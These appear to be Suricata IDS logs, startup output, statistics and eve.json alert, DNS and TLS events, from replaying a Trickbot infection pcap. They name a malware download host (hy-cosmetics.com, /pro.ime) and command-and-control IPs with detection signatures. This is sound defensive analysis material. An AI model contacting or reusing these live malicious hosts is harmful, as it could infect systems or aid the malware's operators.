31/1/2019 -- 09:00:18 - <Config> - host memory usage: 398144 bytes, maximum: 16777216
31/1/2019 -- 09:00:18 - <Config> - using magic-file /usr/share/file/magic
31/1/2019 -- 09:00:18 - <Config> - Core dump size is unlimited.
31/1/2019 -- 09:00:18 - <Config> - allocated 3670016 bytes of memory for the defrag hash... 65536 buckets of size 56
31/1/2019 -- 09:00:18 - <Config> - preallocated 1000 defrag trackers of size 168
31/1/2019 -- 09:00:18 - <Config> - defrag memory usage: 3838016 bytes, maximum: 33554432
31/1/2019 -- 09:00:18 - <Config> - stream "prealloc-sessions": 2048 (per thread)
31/1/2019 -- 09:00:18 - <Config> - stream "memcap": 33554432
31/1/2019 -- 09:00:18 - <Config> - stream "midstream" session pickups: disabled
31/1/2019 -- 09:00:18 - <Config> - stream "async-oneside": disabled
31/1/2019 -- 09:00:18 - <Config> - stream "checksum-validation": disabled
31/1/2019 -- 09:00:18 - <Config> - stream."inline": disabled
31/1/2019 -- 09:00:18 - <Config> - stream "bypass": disabled
31/1/2019 -- 09:00:18 - <Config> - stream "max-synack-queued": 5
31/1/2019 -- 09:00:18 - <Config> - stream.reassembly "memcap": 134217728
31/1/2019 -- 09:00:18 - <Config> - stream.reassembly "depth": 0
31/1/2019 -- 09:00:18 - <Config> - stream.reassembly "toserver-chunk-size": 2625
31/1/2019 -- 09:00:18 - <Config> - stream.reassembly "toclient-chunk-size": 2496
31/1/2019 -- 09:00:18 - <Config> - stream.reassembly.raw: enabled
31/1/2019 -- 09:00:18 - <Config> - stream.reassembly "segment-prealloc": 2048
31/1/2019 -- 09:00:18 - <Config> - Delayed detect disabled
31/1/2019 -- 09:00:18 - <Config> - pattern matchers: MPM: ac, SPM: bm
31/1/2019 -- 09:00:18 - <Config> - grouping: tcp-whitelist (default) 53, 80, 139, 443, 445, 1433, 3306, 3389, 6666, 6667, 8080
31/1/2019 -- 09:00:18 - <Config> - grouping: udp-whitelist (default) 53, 135, 5060
31/1/2019 -- 09:00:18 - <Config> - prefilter engines: MPM
31/1/2019 -- 09:00:18 - <Config> - IP reputation disabled
31/1/2019 -- 09:00:18 - <Perf> - Registered 148 keyword profiling counters.
31/1/2019 -- 09:00:18 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ftp.rules
31/1/2019 -- 09:00:18 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-policy.rules
31/1/2019 -- 09:00:18 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-trojan.rules
31/1/2019 -- 09:00:22 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-games.rules
31/1/2019 -- 09:00:22 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-pop3.rules
31/1/2019 -- 09:00:22 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-user_agents.rules
31/1/2019 -- 09:00:22 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-activex.rules
31/1/2019 -- 09:00:22 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-rpc.rules
31/1/2019 -- 09:00:23 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-attack_response.rules
31/1/2019 -- 09:00:23 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp.rules
31/1/2019 -- 09:00:23 - <Config> - No rules loaded from ET-icmp.rules.
31/1/2019 -- 09:00:23 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-scan.rules
31/1/2019 -- 09:00:23 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-voip.rules
31/1/2019 -- 09:00:23 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-chat.rules
31/1/2019 -- 09:00:23 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp_info.rules
31/1/2019 -- 09:00:23 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-info.rules
31/1/2019 -- 09:00:23 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-shellcode.rules
31/1/2019 -- 09:00:23 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_client.rules
31/1/2019 -- 09:00:23 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-imap.rules
31/1/2019 -- 09:00:23 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_server.rules
31/1/2019 -- 09:00:23 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-current_events.rules
31/1/2019 -- 09:00:26 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-inappropriate.rules
31/1/2019 -- 09:00:26 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-smtp.rules
31/1/2019 -- 09:00:26 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_specific_apps.rules
31/1/2019 -- 09:00:27 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-deleted.rules
31/1/2019 -- 09:00:28 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-malware.rules
31/1/2019 -- 09:00:28 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-snmp.rules
31/1/2019 -- 09:00:28 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-worm.rules
31/1/2019 -- 09:00:28 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dns.rules
31/1/2019 -- 09:00:28 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-misc.rules
31/1/2019 -- 09:00:28 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-sql.rules
31/1/2019 -- 09:00:28 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dos.rules
31/1/2019 -- 09:00:28 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-netbios.rules
31/1/2019 -- 09:00:28 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-telnet.rules
31/1/2019 -- 09:00:28 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-exploit.rules
31/1/2019 -- 09:00:28 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-p2p.rules
31/1/2019 -- 09:00:28 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tftp.rules
31/1/2019 -- 09:00:28 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-mobile_malware.rules
31/1/2019 -- 09:00:30 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-botcc.rules
31/1/2019 -- 09:00:30 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-compromised.rules
31/1/2019 -- 09:00:30 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-drop.rules
31/1/2019 -- 09:00:30 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dshield.rules
31/1/2019 -- 09:00:30 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tor.rules
31/1/2019 -- 09:00:30 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ciarmy.rules
31/1/2019 -- 09:00:30 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/local.rules
31/1/2019 -- 09:00:30 - <Config> - No rules loaded from local.rules.
31/1/2019 -- 09:00:30 - <Info> - 44 rule files processed. 39585 rules successfully loaded, 0 rules failed
31/1/2019 -- 09:00:30 - <Info> - Threshold config parsed: 0 rule(s) found
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for tcp-packet
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for tcp-stream
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for udp-packet
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for other-ip
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_uri
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_request_line
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_client_body
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_response_line
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_header
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_header
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_header_names
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_header_names
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_accept
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_accept_enc
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_accept_lang
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_referer
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_connection
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_content_len
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_content_len
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_content_type
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_content_type
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_protocol
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_protocol
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_start
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_start
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_raw_header
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_raw_header
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_method
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_cookie
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_cookie
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_raw_uri
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_user_agent
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_host
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_raw_host
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_stat_msg
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_stat_code
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for dns_query
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for tls_sni
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for tls_cert_issuer
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for tls_cert_subject
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for tls_cert_serial
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for dce_stub_data
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for dce_stub_data
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for ssh_protocol
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for ssh_protocol
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for ssh_software
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for ssh_software
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for file_data
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for file_data
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_request_line
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_response_line
31/1/2019 -- 09:00:31 - <Info> - 39590 signatures processed. 1175 are IP-only rules, 15422 are inspecting packet payload, 27448 inspect application layer, 0 are decoder event only
31/1/2019 -- 09:00:31 - <Config> - building signature grouping structure, stage 1: preprocessing rules... complete
31/1/2019 -- 09:00:31 - <Perf> - TCP toserver: 41 port groups, 37 unique SGH's, 4 copies
31/1/2019 -- 09:00:31 - <Perf> - TCP toclient: 21 port groups, 20 unique SGH's, 1 copies
31/1/2019 -- 09:00:31 - <Perf> - UDP toserver: 41 port groups, 27 unique SGH's, 14 copies
31/1/2019 -- 09:00:31 - <Perf> - UDP toclient: 21 port groups, 17 unique SGH's, 4 copies
31/1/2019 -- 09:00:31 - <Perf> - OTHER toserver: 254 proto groups, 3 unique SGH's, 251 copies
31/1/2019 -- 09:00:31 - <Perf> - OTHER toclient: 254 proto groups, 0 unique SGH's, 254 copies
31/1/2019 -- 09:00:35 - <Perf> - Unique rule groups: 104
31/1/2019 -- 09:00:35 - <Perf> - Builtin MPM "toserver TCP packet": 35
31/1/2019 -- 09:00:35 - <Perf> - Builtin MPM "toclient TCP packet": 17
31/1/2019 -- 09:00:35 - <Perf> - Builtin MPM "toserver TCP stream": 33
31/1/2019 -- 09:00:35 - <Perf> - Builtin MPM "toclient TCP stream": 19
31/1/2019 -- 09:00:35 - <Perf> - Builtin MPM "toserver UDP packet": 27
31/1/2019 -- 09:00:35 - <Perf> - Builtin MPM "toclient UDP packet": 17
31/1/2019 -- 09:00:35 - <Perf> - Builtin MPM "other IP packet": 3
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toserver http_uri": 14
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toserver http_request_line": 1
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toserver http_client_body": 6
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toclient http_response_line": 1
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toserver http_header": 10
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toclient http_header": 6
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toserver http_header_names": 2
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toserver http_accept": 1
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toserver http_referer": 1
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toserver http_content_len": 1
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toserver http_content_type": 1
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toclient http_content_type": 1
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toserver http_protocol": 1
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toserver http_start": 1
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toserver http_raw_header": 1
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toclient http_raw_header": 1
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toserver http_method": 5
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toserver http_cookie": 1
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toclient http_cookie": 2
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toserver http_raw_uri": 1
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toserver http_user_agent": 6
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toserver http_host": 2
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toclient http_stat_code": 2
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toserver dns_query": 4
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toserver tls_sni": 2
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toclient tls_cert_issuer": 2
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toclient tls_cert_subject": 1
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toclient tls_cert_serial": 1
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toserver ssh_protocol": 1
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toserver file_data": 1
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toclient file_data": 7
31/1/2019 -- 09:00:37 - <Perf> - Registered 39590 rule profiling counters.
31/1/2019 -- 09:00:37 - <Info> - fast output device (regular) initialized: alert
31/1/2019 -- 09:00:37 - <Info> - eve-log output device (regular) initialized: eve.json
31/1/2019 -- 09:00:37 - <Config> - enabling 'eve-log' module 'alert'
31/1/2019 -- 09:00:37 - <Config> - enabling 'eve-log' module 'http'
31/1/2019 -- 09:00:37 - <Config> - enabling 'eve-log' module 'dns'
31/1/2019 -- 09:00:37 - <Config> - enabling 'eve-log' module 'tls'
31/1/2019 -- 09:00:37 - <Config> - enabling 'eve-log' module 'files'
31/1/2019 -- 09:00:37 - <Config> - enabling 'eve-log' module 'ssh'
31/1/2019 -- 09:00:37 - <Info> - Unified2-alert initialized: filename unified2.alert, limit 32 MB
31/1/2019 -- 09:00:37 - <Info> - stats output device (regular) initialized: stats.log
31/1/2019 -- 09:00:37 - <Config> - AutoFP mode using "Hash" flow load balancer
31/1/2019 -- 09:00:37 - <Info> - reading pcap file /var/pcap/01312019.0900-2019-01-30-Trickbot-infection-traffic.pcap
31/1/2019 -- 09:00:37 - <Config> - 

This file has been truncated. Go here to download in full.


stats.log - (2996 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
------------------------------------------------------------------------------------
Date: 1/31/2019 -- 09:00:39 (uptime: 0d, 00h 00m 02s)
------------------------------------------------------------------------------------
Counter                                    | TM Name                   | Value
------------------------------------------------------------------------------------
decoder.pkts                               | Total                     | 7081
decoder.bytes                              | Total                     | 6764059
decoder.ipv4                               | Total                     | 7081
decoder.ethernet                           | Total                     | 7081
decoder.tcp                                | Total                     | 7067
decoder.udp                                | Total                     | 14
decoder.avg_pkt_size                       | Total                     | 955
decoder.max_pkt_size                       | Total                     | 1514
flow.tcp                                   | Total                     | 17
flow.udp                                   | Total                     | 7
tcp.sessions                               | Total                     | 17
tcp.syn                                    | Total                     | 18
tcp.synack                                 | Total                     | 15
tcp.rst                                    | Total                     | 5
detect.alert                               | Total                     | 24
detect.nonmpm_list                         | Total                     | 1
app_layer.flow.http                        | Total                     | 7
app_layer.tx.http                          | Total                     | 7
app_layer.flow.tls                         | Total                     | 8
app_layer.flow.dns_udp                     | Total                     | 7
app_layer.tx.dns_udp                       | Total                     | 7
flow_mgr.closed_pruned                     | Total                     | 1
flow.spare                                 | Total                     | 10000
flow_mgr.flows_checked                     | Total                     | 16
flow_mgr.flows_notimeout                   | Total                     | 13
flow_mgr.flows_timeout                     | Total                     | 3
flow_mgr.flows_timeout_inuse               | Total                     | 2
flow_mgr.flows_removed                     | Total                     | 1
flow_mgr.rows_checked                      | Total                     | 65536
flow_mgr.rows_skipped                      | Total                     | 65520
flow_mgr.rows_maxlen                       | Total                     | 1
tcp.memuse                                 | Total                     | 573440
tcp.reassembly_memuse                      | Total                     | 81920
flow.memuse                                | Total                     | 7079776


eve.json - (28759 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
{"timestamp":"2019-01-30T21:03:50.794981+0000","flow_id":1517736504467813,"pcap_cnt":1,"event_type":"dns","src_ip":"10.1.30.101","src_port":61297,"dest_ip":"10.1.30.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":6097,"rrname":"hy-cosmetics.com","rrtype":"A","tx_id":0}}
{"timestamp":"2019-01-30T21:03:50.821058+0000","flow_id":1517736504467813,"pcap_cnt":2,"event_type":"dns","src_ip":"10.1.30.1","src_port":53,"dest_ip":"10.1.30.101","dest_port":61297,"proto":"UDP","dns":{"type":"answer","id":6097,"rcode":"NOERROR","rrname":"hy-cosmetics.com","rrtype":"A","ttl":6494,"rdata":"37.59.247.21"}}
{"timestamp":"2019-01-30T21:03:51.319533+0000","flow_id":1840385185201884,"pcap_cnt":46,"event_type":"alert","src_ip":"37.59.247.21","src_port":80,"dest_ip":"10.1.30.101","dest_port":49194,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2018959,"rev":3,"signature":"ET POLICY PE EXE or DLL Windows file download HTTP","category":"Potential Corporate Privacy Violation","severity":1},"app_proto":"http"}
{"timestamp":"2019-01-30T21:03:51.319533+0000","flow_id":1840385185201884,"pcap_cnt":46,"event_type":"alert","src_ip":"37.59.247.21","src_port":80,"dest_ip":"10.1.30.101","dest_port":49194,"proto":"TCP","app_proto":"http","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2016538,"rev":3,"signature":"ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download","category":"Potentially Bad Traffic","severity":2}}
{"timestamp":"2019-01-30T21:03:51.783811+0000","flow_id":1840385185201884,"pcap_cnt":222,"event_type":"http","src_ip":"10.1.30.101","src_port":49194,"dest_ip":"37.59.247.21","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"hy-cosmetics.com","url":"\/pro.ime"}}
{"timestamp":"2019-01-30T21:04:05.396575+0000","flow_id":669620050815238,"pcap_cnt":231,"event_type":"tls","src_ip":"10.1.30.101","src_port":49197,"dest_ip":"190.14.158.193","dest_port":449,"proto":"TCP","tls":{"subject":"C=AU, ST=Some-State, O=Internet Widgits Pty Ltd","issuerdn":"C=AU, ST=Some-State, O=Internet Widgits Pty Ltd"}}
{"timestamp":"2019-01-30T21:04:05.406223+0000","flow_id":669620050815238,"pcap_cnt":233,"event_type":"alert","src_ip":"190.14.158.193","src_port":449,"dest_ip":"10.1.30.101","dest_port":49197,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2011540,"rev":6,"signature":"ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)","category":"Not Suspicious Traffic","severity":3},"app_proto":"tls"}
{"timestamp":"2019-01-30T21:04:07.660901+0000","flow_id":159423033447845,"pcap_cnt":239,"event_type":"dns","src_ip":"10.1.30.101","src_port":58156,"dest_ip":"10.1.30.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":53857,"rrname":"api.ipify.org","rrtype":"A","tx_id":0}}
{"timestamp":"2019-01-30T21:04:07.690476+0000","flow_id":159423033447845,"pcap_cnt":240,"event_type":"dns","src_ip":"10.1.30.1","src_port":53,"dest_ip":"10.1.30.101","dest_port":58156,"proto":"UDP","dns":{"type":"answer","id":53857,"rcode":"NOERROR","rrname":"api.ipify.org","rrtype":"CNAME","ttl":200,"rdata":"nagano-19599.herokussl.com"}}
{"timestamp":"2019-01-30T21:04:07.690476+0000","flow_id":159423033447845,"pcap_cnt":240,"event_type":"dns","src_ip":"10.1.30.1","src_port":53,"dest_ip":"10.1.30.101","dest_port":58156,"proto":"UDP","dns":{"type":"answer","id":53857,"rcode":"NOERROR","rrname":"nagano-19599.herokussl.com","rrtype":"CNAME","ttl":3058,"rdata":"elb097307-934924932.us-east-1.elb.amazonaws.com"}}
{"timestamp":"2019-01-30T21:04:07.690476+0000","flow_id":159423033447845,"pcap_cnt":240,"event_type":"dns","src_ip":"10.1.30.1","src_port":53,"dest_ip":"10.1.30.101","dest_port":58156,"proto":"UDP","dns":{"type":"answer","id":53857,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":38,"rdata":"107.22.215.20"}}
{"timestamp":"2019-01-30T21:04:07.690476+0000","flow_id":159423033447845,"pcap_cnt":240,"event_type":"dns","src_ip":"10.1.30.1","src_port":53,"dest_ip":"10.1.30.101","dest_port":58156,"proto":"UDP","dns":{"type":"answer","id":53857,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":38,"rdata":"54.243.123.39"}}
{"timestamp":"2019-01-30T21:04:07.690476+0000","flow_id":159423033447845,"pcap_cnt":240,"event_type":"dns","src_ip":"10.1.30.1","src_port":53,"dest_ip":"10.1.30.101","dest_port":58156,"proto":"UDP","dns":{"type":"answer","id":53857,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":38,"rdata":"50.16.248.221"}}
{"timestamp":"2019-01-30T21:04:07.690476+0000","flow_id":159423033447845,"pcap_cnt":240,"event_type":"dns","src_ip":"10.1.30.1","src_port":53,"dest_ip":"10.1.30.101","dest_port":58156,"proto":"UDP","dns":{"type":"answer","id":53857,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":38,"rdata":"50.19.247.198"}}
{"timestamp":"2019-01-30T21:04:07.690476+0000","flow_id":159423033447845,"pcap_cnt":240,"event_type":"dns","src_ip":"10.1.30.1","src_port":53,"dest_ip":"10.1.30.101","dest_port":58156,"proto":"UDP","dns":{"type":"answer","id":53857,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":38,"rdata":"54.204.36.156"}}
{"timestamp":"2019-01-30T21:04:07.690476+0000","flow_id":159423033447845,"pcap_cnt":240,"event_type":"dns","src_ip":"10.1.30.1","src_port":53,"dest_ip":"10.1.30.101","dest_port":58156,"proto":"UDP","dns":{"type":"answer","id":53857,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":38,"rdata":"23.21.121.219"}}
{"timestamp":"2019-01-30T21:04:08.783070+0000","flow_id":2054532255682294,"pcap_cnt":254,"event_type":"tls","src_ip":"10.1.30.101","src_port":49199,"dest_ip":"107.22.215.20","dest_port":443,"proto":"TCP","tls":{"subject":"OU=Domain Control Validated, OU=PositiveSSL Wildcard, CN=*.ipify.org","issuerdn":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA"}}
{"timestamp":"2019-01-30T21:04:10.762144+0000","flow_id":628319645729144,"pcap_cnt":271,"event_type":"alert","src_ip":"92.38.135.151","src_port":447,"dest_ip":"10.1.30.101","dest_port":49200,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2810654,"rev":4,"signature":"ETPRO POLICY Possibly Suspicious example.com SSL Cert","category":"A Network Trojan was detected","severity":1},"app_proto":"tls"}
{"timestamp":"2019-01-30T21:04:10.762620+0000","flow_id":628319645729144,"pcap_cnt":273,"event_type":"tls","src_ip":"10.1.30.101","src_port":49200,"dest_ip":"92.38.135.151","dest_port":447,"proto":"TCP","tls":{"subject":"C=GB, ST=London, L=London, O=Global Security, OU=IT Department, CN=example.com","issuerdn":"C=GB, ST=London, L=London, O=Global Security, OU=IT Department, CN=example.com"}}
{"timestamp":"2019-01-30T21:04:10.771347+0000","flow_id":628319645729144,"pcap_cnt":275,"event_type":"alert","src_ip":"92.38.135.151","src_port":447,"dest_ip":"10.1.30.101","dest_port":49200,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2021013,"rev":6,"signature":"ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex CnC)","category":"A Network Trojan was detected","severity":1},"app_proto":"tls"}
{"timestamp":"2019-01-30T21:04:10.771347+0000","flow_id":628319645729144,"pcap_cnt":275,"event_type":"alert","src_ip":"92.38.135.151","src_port":447,"dest_ip":"10.1.30.101","dest_port":49200,"proto":"TCP","app_proto":"tls","alert":{"action":"allowed","gid":1,"signature_id":2810654,"rev":4,"signature":"ETPRO POLICY Possibly Suspicious example.com SSL Cert","category":"A Network Trojan was detected","severity":1}}
{"timestamp":"2019-01-30T21:04:59.535170+0000","flow_id":2041806270841738,"pcap_cnt":2942,"event_type":"tls","src_ip":"10.1.30.101","src_port":49201,"dest_ip":"190.14.158.193","dest_port":449,"proto":"TCP","tls":{"subject":"C=AU, ST=Some-State, O=Internet Widgits Pty Ltd","issuerdn":"C=AU, ST=Some-State, O=Internet Widgits Pty Ltd"}}
{"timestamp":"2019-01-30T21:04:59.542845+0000","flow_id":2041806270841738,"pcap_cnt":2944,"event_type":"alert","src_ip":"190.14.158.193","src_port":449,"dest_ip":"10.1.30.101","dest_port":49201,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2011540,"rev":6,"signature":"ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)","category":"Not Suspicious Traffic","severity":3},"app_proto":"tls"}
{"timestamp":"2019-01-30T21:05:01.993038+0000","flow_id":1939759995579485,"pcap_cnt":2968,"event_type":"tls","src_ip":"10.1.30.101","src_port":49202,"dest_ip":"190.14.158.193","dest_port":449,"proto":"TCP","tls":{"subject":"C=AU, ST=Some-State, O=Internet Widgits Pty Ltd","issuerdn":"C=AU, ST=Some-State, O=Internet Widgits Pty Ltd"}}
{"timestamp":"2019-01-30T21:05:01.999394+0000","flow_id":1939759995579485,"pcap_cnt":2970,"event_type":"alert","src_ip":"190.14.158.193","src_port":449,"dest_ip":"10.1.30.101","dest_port":49202,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2011540,"rev":6,"signature":"ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)","category":"Not Suspicious Traffic","severity":3},"app_proto":"tls"}
{"timestamp":"2019-01-30T21:05:22.548371+0000","flow_id":1405730205864804,"pcap_cnt":3158,"event_type":"alert","src_ip":"10.1.30.101","src_port":49203,"dest_ip":"24.247.181.125","dest_port":8082,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2018358,"rev":7,"signature":"ET INFO GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1","category":"Potentially Bad Traffic","severity":2},"app_proto":"http"}
